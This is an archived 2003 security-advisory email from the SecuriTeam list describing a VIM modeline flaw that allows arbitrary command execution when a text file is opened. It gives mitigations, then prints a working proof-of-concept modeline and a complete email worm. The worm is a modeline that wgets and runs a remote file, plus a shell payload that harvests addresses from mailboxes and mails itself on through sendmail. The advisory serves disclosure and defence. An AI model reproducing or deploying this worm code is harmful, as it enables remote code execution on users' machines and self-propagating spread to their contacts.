[UNIX] The First VIM Worm

From: support@securiteam.com
Date: 01/21/03

  • Next message: support@securiteam.com: "[UNIX] Multiple Vulnerabilities Found in PHP "Topsites"" 
    From: support@securiteam.com
To: list@securiteam.com
Date: 21 Jan 2003 16:38:42 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Beyond Security would like to welcome Tiscali World Online
    to our service provider team.
    For more info on their service offering IP-Secure,
    please visit http://www.worldonline.co.za/services/work_ip.asp
    - - - - - - - - -

      The First VIM Worm
    ------------------------------------------------------------------------

    SUMMARY

    A vulnerability in VIM has been found by Georgi Guninski that allows a
    remote attacker to cause the execution of arbitrary code whenever an
    unsuspecting user will open a text file. This is vulnerability can be
    further extended into a worm as illustrated below.

    DETAILS

    Protection:
    Put the following in your ~/.vimrc or better in a system wide config file:
    set modelines=0

    It disables modelines without breaking significant functionality - there
    is no compatibility in this stuff between vim and emacs anyway.

    Even when/if vim is fixed Georgi Guninski strongly recommends keeping this
    solution to prevent from similar exploits in the future.

    Emacs addicts are recommended to disable local variables which may pose
    similar threat by putting the following in ~/.emacs
    ;; disable local variables
    (setq enable-local-variables nil)

    How it works:
    There is a little bug in vi, which allows command execution.

    The following two lines execute the ls command on target host, if the file
    is opened with vim. (Try it out with "vi viexpl.txt").

    (In all of the below examples, the letter I of vim has been replaced with
    an !)

    /* v!m:set foldmethod=expr: */
    /* v!m:set
    foldexpr=confirm(libcall("/lib/libc.so.6","system","ls"),"ms_sux"): */

    The output is:
    -- START OF OUTPUT --
    "viexpl.txt" 2L, 113CREADME TODO commands.sh commands.sh.long
    mail.txt proof.txt test.txt viexpl.txt viworm.txt worm.sh

    ms_sux:
    -- END OF OUTPUT

    The worm use this bug to download a file to the /tmp directory.

    -- START OF VIWORM FILE --
    /* v!m:set foldmethod=expr: */
    /* v!m:set foldexpr=confirm(libcall("/lib/libc.so.6","system","cd\
    /tmp;wget\ 127.0.0.1/joni8172ff3g;chmod\ 0755\
    /tmp/joni8172ff3g;/tmp/joni8172ff3g"),"ms_sux"): */
    -- END OF VIWORM FILE --

    The above file does:
     * Change to /tmp
     * Download file joni8172ff3g to /tmp with wget from 127.0.0.1 (Change the
    IP to your webserver 127.0.0.1 is localhost).

     * Make it executable with chmod 0755

     * Execute the file

    Here is the code of the downloaded file:
    -- START OF FILE --
    echo 'JuliaBabe1234@gmx.net'>>/var/spool/mail/$USER;echo
    'CharlesBob1234@gmx.net'>>~/mbox;cat ~/mbox /var/spool/mail/*|grep '@'|cut
    -d ' ' -f 2|grep '@'|grep -v '<'|grep -v '"'|grep -v ','|sort|uniq >
    /tmp/h0oVeR183257;for i in `cat /tmp/h0oVeR183257`;do echo -e
    "/usr/sbin/sendmail $i <<EOFF\nSubject: Hi\nContent-Type: text/plain;
    charset=us-ascii\nContent-Disposition: attachment;
    filename=\"concept.txt\"\n\n/* v!m:set foldmethod=expr: */\n/* v!m:set
    foldexpr=confirm(libcall(\"/lib/libc.so.6\",\"system\",\"cd\ /tmp;wget\
    127.0.0.1/joni8172ff3g;chmod\ 0755\
    /tmp/joni8172ff3g;/tmp/joni8172ff3g\"),\"ms_sux\"):
    */\n\nEOFF">/tmp/f33lOe18352;. /tmp/f33lOe18352 2> /dev/null;done
    -- END OF FILE --

     * Set fake address for /var/spool/mail/$USER (if file not exist).

     * Set fake address for ~/mbox (if file not exist).

     * Get mail address with grep, grep -v from ~/mbox and /var/spool/mail/*

     * Sort the stuff and make it unique (Only one file per address).

     * Send a mail with sendmail for every address with Subject Hi, and
    attachment the viworm file (concept.txt).

     * Execute all the stuff and send stderr to /dev/null

    If the other users open the mail with the vi editor the wormfile is
    downloaded and executed.

    ADDITIONAL INFORMATION

    Georgi Guninski's advisory can be found at:
     <http://www.guninski.com/vim1.html> http://www.guninski.com/vim1.html

    The information has been provided by Nostradamus and Georgi Guninski.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.